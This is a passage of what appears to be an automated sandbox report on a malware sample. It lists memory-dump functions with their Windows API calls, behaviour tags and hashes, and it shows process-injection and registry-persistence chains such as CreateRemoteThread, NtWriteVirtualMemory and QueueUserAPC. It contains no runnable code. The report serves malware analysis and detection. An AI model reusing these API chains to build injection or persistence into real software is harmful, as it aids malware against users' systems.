                                                                                  • Instruction Fuzzy Hash: 6361E73271CB198FEB699F28A8492BA73D1F795310B15456DE8CFD3241EE20E84287C2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DB6B80, Relevance: 4.8, APIs: 3, Instructions: 297memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Virtual$AllocCreateFreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 2341667014-0
                                                                                  • Opcode ID: f400db90b547cd876deae4f918f036170426a129d3192a9b6cb0266f0b9909ab
                                                                                  • Instruction ID: 37d821109863b7621b88598f607d46e24dd1a7cd19ed8a719de290a06332be23
                                                                                  • Opcode Fuzzy Hash: f400db90b547cd876deae4f918f036170426a129d3192a9b6cb0266f0b9909ab
                                                                                  • Instruction Fuzzy Hash: 7791A530618B09CFE758EF28D8457AA77E5FB94304F10452DE98BC3251EF78E8468782
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DB2BD8, Relevance: 4.7, APIs: 3, Instructions: 197nativethreadinjectionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtSetInformationProcess.NTDLL ref: 04DB2CA2
                                                                                  • CreateRemoteThread.KERNEL32 ref: 04DB2D52
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateInformationProcessRemoteThread
                                                                                  • String ID:
                                                                                  • API String ID: 3020566308-0
                                                                                  • Opcode ID: 88fe45be16d0b1cc0aca176e81cbde1e558c0c971979f96992a73c50b40fe50a
                                                                                  • Instruction ID: 9e40841bf6b3cc27a75ee5ab14685dfa74b1c39b57276aadef51a688e6dde5e1
                                                                                  • Opcode Fuzzy Hash: 88fe45be16d0b1cc0aca176e81cbde1e558c0c971979f96992a73c50b40fe50a
                                                                                  • Instruction Fuzzy Hash: 6F51A131618B098FDB68EF28D89C6AA77E1FB99301F10456DD98BC3251EE34E8458BC1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DB5890, Relevance: 4.1, APIs: 2, Instructions: 1144synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateMutexExA.KERNEL32 ref: 04DB595B
                                                                                  • GetShellWindow.USER32 ref: 04DB5CC3
                                                                                    • Part of subcall function 04DBFAD4: CreateThread.KERNEL32 ref: 04DBFB04
                                                                                    • Part of subcall function 04DBFAD4: QueueUserAPC.KERNEL32 ref: 04DBFB1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Create$MutexQueueShellThreadUserWindow
                                                                                  • String ID:
                                                                                  • API String ID: 763106962-0
                                                                                  • Opcode ID: db72f500cb4375137250dc09fd218a16c329592276e667ceebb262ae2802a11d
                                                                                  • Instruction ID: c863d0b1813ef0264c4b4d1d028142bca1ace81a5a9ccdc46014e4668813ef70
                                                                                  • Opcode Fuzzy Hash: db72f500cb4375137250dc09fd218a16c329592276e667ceebb262ae2802a11d
                                                                                  • Instruction Fuzzy Hash: 4F829471618E08CFEB28EF28EC955A977E1F758305B20452ED48BC3261DE38E556CBC6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DC1EEC, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtCreateSection.NTDLL ref: 04DC208E
                                                                                    • Part of subcall function 04DBEF14: NtMapViewOfSection.NTDLL ref: 04DBEF60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Section$CreateView
                                                                                  • String ID: 0
                                                                                  • API String ID: 1585966358-4108050209
                                                                                  • Opcode ID: bff07a427199abbb54e216f8b5ce246404a06d6e97ef88a9cd07a294772bde48
                                                                                  • Instruction ID: 4317dbc08004b3bb3c2d1a2e1c8b18398c217e3668b3b1939dc7c136449cd743
                                                                                  • Opcode Fuzzy Hash: bff07a427199abbb54e216f8b5ce246404a06d6e97ef88a9cd07a294772bde48
                                                                                  • Instruction Fuzzy Hash: 8161C67061CB098FDB54EF19D8D9AA5B7E1FB98311F10856ED88EC7261DB34E841CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DCF9A4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memorynativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL ref: 04DCF9E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID: @
                                                                                  • API String ID: 2167126740-2766056989
                                                                                  • Opcode ID: 4419f098cbed19c14a3831561b5072b94f6620ca33e076ad1f3694b096d49546
                                                                                  • Instruction ID: baacc54ad0e6856bee32773bb27129599d0e9fe01e2c13c3859d9a6498b5b10f
                                                                                  • Opcode Fuzzy Hash: 4419f098cbed19c14a3831561b5072b94f6620ca33e076ad1f3694b096d49546
                                                                                  • Instruction Fuzzy Hash: F4F09070718B089BDB44AFA8D8CC66D76E1F749305F500A6DE24AC7294DB7896488742
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DE1002, Relevance: 3.4, APIs: 2, Instructions: 354nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtProtectVirtualMemory.NTDLL ref: 04DE1298
                                                                                  • NtProtectVirtualMemory.NTDLL ref: 04DE1327
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1032123240.0000000004DE1000.00000040.00000001.sdmp, Offset: 04DE1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: MemoryProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2706961497-0
                                                                                  • Opcode ID: 38e87936c4561e278a61e3dc9a4b72cb561c783eb35cae35dcf4fe7b1ab1b7f0
                                                                                  • Instruction ID: 77f205a37307c7c9df72fac692ee4134f3a30876f07733de843b40d5ba86bb2b
                                                                                  • Opcode Fuzzy Hash: 38e87936c4561e278a61e3dc9a4b72cb561c783eb35cae35dcf4fe7b1ab1b7f0
                                                                                  • Instruction Fuzzy Hash: 03B1B331318B884FC729EF69CC81ABAB7E1FB96310F54496ED4CBC7252E634A5468742
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DB3438, Relevance: 3.3, APIs: 2, Instructions: 336memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlReAllocateHeap.NTDLL ref: 04DB3544
                                                                                  • FindCloseChangeNotification.KERNEL32 ref: 04DB35D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: AllocateChangeCloseFindHeapNotification
                                                                                  • String ID:
                                                                                  • API String ID: 3208096886-0
                                                                                  • Opcode ID: 7678bd7e555d6fa46e6d41c741ebccd0a24483e268ff7e2a3b40300795467821
                                                                                  • Instruction ID: 0a8eb9700811df295ef12db67b8ebd2d3ac090aca1fd8af69a5c69ac2f7c1280
                                                                                  • Opcode Fuzzy Hash: 7678bd7e555d6fa46e6d41c741ebccd0a24483e268ff7e2a3b40300795467821
                                                                                  • Instruction Fuzzy Hash: D4B17E70618B49CFD768DF1CD8956AAB7E1FB98315F54852DE88BC3250DB34E842CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DA78F0, Relevance: 3.2, APIs: 2, Instructions: 245registrytimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04DC3A14: RegCreateKeyA.ADVAPI32 ref: 04DC3A37
                                                                                  • RegNotifyChangeKeyValue.KERNEL32 ref: 04DA79B6
                                                                                  • SetWaitableTimer.KERNEL32 ref: 04DA7A63
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ChangeCreateNotifyTimerValueWaitable
                                                                                  • String ID:
                                                                                  • API String ID: 1746168554-0
                                                                                  • Opcode ID: c1e1e75bb4ba801a851f437e4f7619f1a27a3ebbbcb1b3524c1dfa9b29a14438
                                                                                  • Instruction ID: 31fcace707d6a82ae0307973beeb65c6d537f8c5f0114073befba8811f4048f9
                                                                                  • Opcode Fuzzy Hash: c1e1e75bb4ba801a851f437e4f7619f1a27a3ebbbcb1b3524c1dfa9b29a14438
                                                                                  • Instruction Fuzzy Hash: 09817F30718A548FD769EF28D89462EB7E6FBC8704F50491DE08AC3251DF38E5528B82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DB1A9C, Relevance: 3.2, APIs: 2, Instructions: 183memorynativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL ref: 04DB1AC7
                                                                                  • NtQueryInformationProcess.NTDLL ref: 04DB1B11
                                                                                    • Part of subcall function 04DC9584: NtReadVirtualMemory.NTDLL ref: 04DC95A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: AllocateHeapInformationMemoryProcessQueryReadVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 886377554-0
                                                                                  • Opcode ID: 9a740e8d5b5476b82932378add8e054f58975064e2ab11c2d11b02dad6292d67
                                                                                  • Instruction ID: 9cfac609f707cfd1e2a9ec9b1ff4f3741c1a832cb57720f2044a170ae4670931
                                                                                  • Opcode Fuzzy Hash: 9a740e8d5b5476b82932378add8e054f58975064e2ab11c2d11b02dad6292d67
                                                                                  • Instruction Fuzzy Hash: 57516430618B448BD719EF18E8957DAB3E5FBD8340F44456EE88EC3245DE34EA4587C2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DC9C04, Relevance: 1.9, APIs: 1, Instructions: 361COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04DC3A14: RegCreateKeyA.ADVAPI32 ref: 04DC3A37
                                                                                  • RtlDeleteBoundaryDescriptor.NTDLL ref: 04DC9CF3
                                                                                    • Part of subcall function 04DB7314: RegQueryValueExA.KERNEL32 ref: 04DB7352
                                                                                    • Part of subcall function 04DB7314: RegCloseKey.KERNEL32 ref: 04DB73BF
                                                                                    • Part of subcall function 04DC5688: CallNamedPipeA.KERNEL32 ref: 04DC577D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: BoundaryCallCloseCreateDeleteDescriptorNamedPipeQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 1167359317-0
                                                                                  • Opcode ID: 75358de8b248b72dd6dcd7d2f0d98626ec4f2c8457470f83a1c56f9bd739f2e4
                                                                                  • Instruction ID: 2280b619b1d695df30e81df8d28c2ab2367100b9c017aeee404ecc65ff8e254d
                                                                                  • Opcode Fuzzy Hash: 75358de8b248b72dd6dcd7d2f0d98626ec4f2c8457470f83a1c56f9bd739f2e4
                                                                                  • Instruction Fuzzy Hash: 4EB1947171CB498FE769EF2CE8956AA73D2F7C8310F14856DD49BC3254DE34A8428B82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DA3F98, Relevance: 1.8, APIs: 1, Instructions: 350fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04DCE614: GetTempFileNameA.KERNEL32(?,?,?,?,?,?,000003EE,04DCD3FF), ref: 04DCE68B
                                                                                  • DeleteFileA.KERNEL32 ref: 04DA409E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: File$DeleteNameTemp
                                                                                  • String ID:
                                                                                  • API String ID: 1648863064-0
                                                                                  • Opcode ID: 53651bd14cfc4637d5ef26a83fcb6ecaef80afa0c2776a40eefafa69a2ccebd2
                                                                                  • Instruction ID: 52844f1b30edf58cbed8a3ee7a9b3630a55428f733f3803c37e1e2e2c039d4ad
                                                                                  • Opcode Fuzzy Hash: 53651bd14cfc4637d5ef26a83fcb6ecaef80afa0c2776a40eefafa69a2ccebd2
                                                                                  • Instruction Fuzzy Hash: 0F910631718B194FAB29EF3D989867A77D6FBD8304B44053DD88BC3255EEA4E4128781
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DA7D44, Relevance: 1.8, APIs: 1, Instructions: 260nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 04DA7D8E
                                                                                    • Part of subcall function 04DC9584: NtReadVirtualMemory.NTDLL ref: 04DC95A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1498878907-0
                                                                                  • Opcode ID: f71da2c1d700475dd62744b03ff98d6cb68d52ba00485d21b8ebf3fe6f41c93c
                                                                                  • Instruction ID: 495b6c4a988d267ce1c036b1226ac14bf9453c620fe8ab95963cb922d43077f7
                                                                                  • Opcode Fuzzy Hash: f71da2c1d700475dd62744b03ff98d6cb68d52ba00485d21b8ebf3fe6f41c93c
                                                                                  • Instruction Fuzzy Hash: 1381B631618B498FDB18EF1CD8855A9B7E1FB98300F54462EE88AC3251DB34F965C7C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DA1C74, Relevance: 1.6, APIs: 1, Instructions: 67nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtQuerySystemInformation.NTDLL ref: 04DA1CCD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: InformationQuerySystem
                                                                                  • String ID:
                                                                                  • API String ID: 3562636166-0
                                                                                  • Opcode ID: 689c2ab68dde1b28acf5e4d81f7a77a90a1f537d4556aa00ee1b23a80f1aec5f
                                                                                  • Instruction ID: 768c186a732b2fa21d81b47540c7c79986234cf1d180452fd6709cc6c06bf60c
                                                                                  • Opcode Fuzzy Hash: 689c2ab68dde1b28acf5e4d81f7a77a90a1f537d4556aa00ee1b23a80f1aec5f
                                                                                  • Instruction Fuzzy Hash: 3411A031308B068FEB16EFA9D8D476AB3E6FBD9301F041028E546C3254DA78E890C742
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DC9B4C, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtQueryInformationProcess.NTDLL ref: 04DC9B72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: InformationProcessQuery
                                                                                  • String ID:
                                                                                  • API String ID: 1778838933-0
                                                                                  • Opcode ID: 535eaa1e8fa4e57c8457d3b97bc13a9891625e3889b775ada58f90c1645a05b3
                                                                                  • Instruction ID: a488c9400a1ad9fc7a84430aca1e620470f1c35dd624bd49e0363c093b7d4b3f
                                                                                  • Opcode Fuzzy Hash: 535eaa1e8fa4e57c8457d3b97bc13a9891625e3889b775ada58f90c1645a05b3
                                                                                  • Instruction Fuzzy Hash: 0D01AF30728E0E9F9BA4EF68D8D4A7573E1FBA8305F9405AEA40AC7124DB35E481CB01
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DBEF14, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: SectionView
                                                                                  • String ID:
                                                                                  • API String ID: 1323581903-0
                                                                                  • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                                                  • Instruction ID: 28a88241e0b61d2b01bfb532f782e219c1a736f4c4ca14fdf5089f943f1bf6c8
                                                                                  • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                                                  • Instruction Fuzzy Hash: C501D2B0A08B048FCB48EF69D0C8569BBE1FB5C311B10066FE94ACB796DB70D885CB45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DC9584, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: MemoryReadVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2834387570-0
                                                                                  • Opcode ID: e58987f80468f70ec91a2ed1fa834a055c9813d537c8f59ba17893b64c4e2010
                                                                                  • Instruction ID: 319549bd29448b17327f3045b230a60e311ee2f3937327b7675bdb117ed7c393
                                                                                  • Opcode Fuzzy Hash: e58987f80468f70ec91a2ed1fa834a055c9813d537c8f59ba17893b64c4e2010
                                                                                  • Instruction Fuzzy Hash: 7FE0DFB0B25A854FEB04AFB488DC2387BD1F78C301F00487DE985C7324DA39D8458742
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DCC130, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtWriteVirtualMemory.NTDLL ref: 04DCC14F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: MemoryVirtualWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3527976591-0
                                                                                  • Opcode ID: 044d061100dc2f65acf27f7f25103d145d0c5bc09adff489407d62ec8c1892a3
                                                                                  • Instruction ID: 4dc83587b8c3f8c41e17355120b4e02ee5c2d5a82aa813bb4f742117d6f6bff0
                                                                                  • Opcode Fuzzy Hash: 044d061100dc2f65acf27f7f25103d145d0c5bc09adff489407d62ec8c1892a3
                                                                                  • Instruction Fuzzy Hash: BFE04F34B25A858BEB046BF58DC923973D1F798716F10093DEA8DC7364EA2DE8448742
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DAD104, Relevance: 7.6, APIs: 5, Instructions: 150fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: File$ChangeCloseCreateFindNotificationPointerWrite
                                                                                  • String ID:
                                                                                  • API String ID: 175865374-0
                                                                                  • Opcode ID: caf0f986d6000c2ad4984d594418c9f3db73cbef372ff10eec0889c29edf7caf
                                                                                  • Instruction ID: 95659ee7437636e676fca212c9c9b8463a5218a56881ebde295afd2e8c9bcd77
                                                                                  • Opcode Fuzzy Hash: caf0f986d6000c2ad4984d594418c9f3db73cbef372ff10eec0889c29edf7caf
                                                                                  • Instruction Fuzzy Hash: B141B931618A044FE71C9F1CE88A33576D2F749329F64522DE89BC32D2EF78D9538686
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DA3670, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 190processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32 ref: 04DA3766
                                                                                  • GetExitCodeProcess.KERNEL32 ref: 04DA3806
                                                                                  • FindCloseChangeNotification.KERNEL32 ref: 04DA3811
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Process$ChangeCloseCodeCreateExitFindNotification
                                                                                  • String ID: h
                                                                                  • API String ID: 2788277846-2439710439
                                                                                  • Opcode ID: 561cc8bf63b4cda6d7556beb26dcb30ae127133dc4795f538f8f79638353f4f1
                                                                                  • Instruction ID: d717336dec655841b223a2b79658dc685db0d2626adfd8d037afa8b40b487ef4
                                                                                  • Opcode Fuzzy Hash: 561cc8bf63b4cda6d7556beb26dcb30ae127133dc4795f538f8f79638353f4f1
                                                                                  • Instruction Fuzzy Hash: 35516371618B498FE764EF68D88966AB7E1FB98351F10453EE88AC3260DF74D441CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DCD604, Relevance: 6.2, APIs: 4, Instructions: 237threadinjectionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectThreadVirtual$ResumeSuspend
                                                                                  • String ID:
                                                                                  • API String ID: 3483329683-0
                                                                                  • Opcode ID: 75d28ba2168fea58c028bc4a2b0ec14675e6907b57b39628122c9898c1626db4
                                                                                  • Instruction ID: 18c044230b1c43effb5e9a8d49df099836d26ef2cb175f679d6d00730f10ca5d
                                                                                  • Opcode Fuzzy Hash: 75d28ba2168fea58c028bc4a2b0ec14675e6907b57b39628122c9898c1626db4
                                                                                  • Instruction Fuzzy Hash: 6761603071CA498BDB58EF18E8857AB73D2FB88315F40052DE58FC3291EE34E945CA86
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DD01D8, Relevance: 6.1, APIs: 4, Instructions: 146fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32 ref: 04DD02A9
                                                                                  • SetFilePointer.KERNEL32 ref: 04DD02C3
                                                                                  • ReadFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04DAC808), ref: 04DD02E5
                                                                                  • FindCloseChangeNotification.KERNEL32 ref: 04DD0300
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                                                                                  • String ID:
                                                                                  • API String ID: 2405668454-0
                                                                                  • Opcode ID: 44e22345d8330a418f6abae9002e3c4157819e7657d1355bb38e3d245859f345
                                                                                  • Instruction ID: abf63a34ce3e5d78cc6fc5339b921cdd54cdb498b4a59b4fc1c7e683b2c4c0cd
                                                                                  • Opcode Fuzzy Hash: 44e22345d8330a418f6abae9002e3c4157819e7657d1355bb38e3d245859f345
                                                                                  • Instruction Fuzzy Hash: 3C41F930258A084FDB59DF28D8C8A2977E2F7C8315F14466DD08AC7255DF35D447CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DCEC08, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04DC3A14: RegCreateKeyA.ADVAPI32 ref: 04DC3A37
                                                                                  • RegQueryValueExA.KERNEL32 ref: 04DCEC71
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueryValue
                                                                                  • String ID: ($(
                                                                                  • API String ID: 2711935003-222463766
                                                                                  • Opcode ID: aebbbd127d4d5bc710cf9a7e1be097ee6a9f73d84e0cac9d7a5cc9686012e21f
                                                                                  • Instruction ID: 12ee5be34b5059ba90417b0ed7efdbc6fb882adcb60f17307237c52bb7edbc57
                                                                                  • Opcode Fuzzy Hash: aebbbd127d4d5bc710cf9a7e1be097ee6a9f73d84e0cac9d7a5cc9686012e21f
                                                                                  • Instruction Fuzzy Hash: 4531C275618B49CFF304EF58EC44B66B3E5FB88306F00462DD44AC3261EBB8A645CB42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DBCB3C, Relevance: 4.7, APIs: 3, Instructions: 169registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04DB7500: FindFirstFileW.KERNEL32 ref: 04DB760A
                                                                                  • RegOpenKeyA.ADVAPI32 ref: 04DBCC5B
                                                                                  • RegSetValueExA.KERNEL32 ref: 04DBCC8F
                                                                                  • RegCloseKey.KERNEL32 ref: 04DBCC9D
                                                                                    • Part of subcall function 04DBB424: CreateFileW.KERNEL32 ref: 04DBB45D
                                                                                    • Part of subcall function 04DAD104: CreateFileW.KERNEL32 ref: 04DAD163
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: File$Create$CloseFindFirstOpenValue
                                                                                  • String ID:
                                                                                  • API String ID: 3325113042-0
                                                                                  • Opcode ID: 5fb5268868995c9949eb7d190cb71495cab3a013b0985f5d45bdb151bdc3693a
                                                                                  • Instruction ID: 17fd32ced38b09c0617115856cebea67e09f2aefaab2ab4db2e48b483ddd0c91
                                                                                  • Opcode Fuzzy Hash: 5fb5268868995c9949eb7d190cb71495cab3a013b0985f5d45bdb151bdc3693a
                                                                                  • Instruction Fuzzy Hash: F1518F31618A488FDB69EF28E894ADE77E1FB98300F50852EE48BC7154EF34E545CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DA3BF8, Relevance: 4.7, APIs: 3, Instructions: 159registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: b319f3c8eb388dc46dcd800776cad2be2dfa964747ee37405a86622074352ef8
                                                                                  • Instruction ID: a6de87c24003d00c8b0bbc9696f13ed62e2fc8251be7a3cbd695569e40cb3300
                                                                                  • Opcode Fuzzy Hash: b319f3c8eb388dc46dcd800776cad2be2dfa964747ee37405a86622074352ef8
                                                                                  • Instruction Fuzzy Hash: ED41413571CB488FDB55EF65D894A6AB7E6FBC8304F10492DE44AC3260DF74E8418B82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DD17F8, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: H
                                                                                  • API String ID: 1029625771-2852464175
                                                                                  • Opcode ID: af339ca8fb1bdb443c65b5f34cc288c383d11c23e6bfa41b3006492691236aab
                                                                                  • Instruction ID: 7ea9f2c9230a737980e238cf9b03932bfdcb374a44de84ebb674466f6f8db22e
                                                                                  • Opcode Fuzzy Hash: af339ca8fb1bdb443c65b5f34cc288c383d11c23e6bfa41b3006492691236aab
                                                                                  • Instruction Fuzzy Hash: 93A19230608F0A8FE755DF98D88967AB7E1FB99305F04462EE84AC3265EF34E545CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DB4B94, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04DC3A14: RegCreateKeyA.ADVAPI32 ref: 04DC3A37
                                                                                  • RegSetValueExA.KERNEL32 ref: 04DB4BDD
                                                                                  Strings
                                                                                  Memory Dump Source
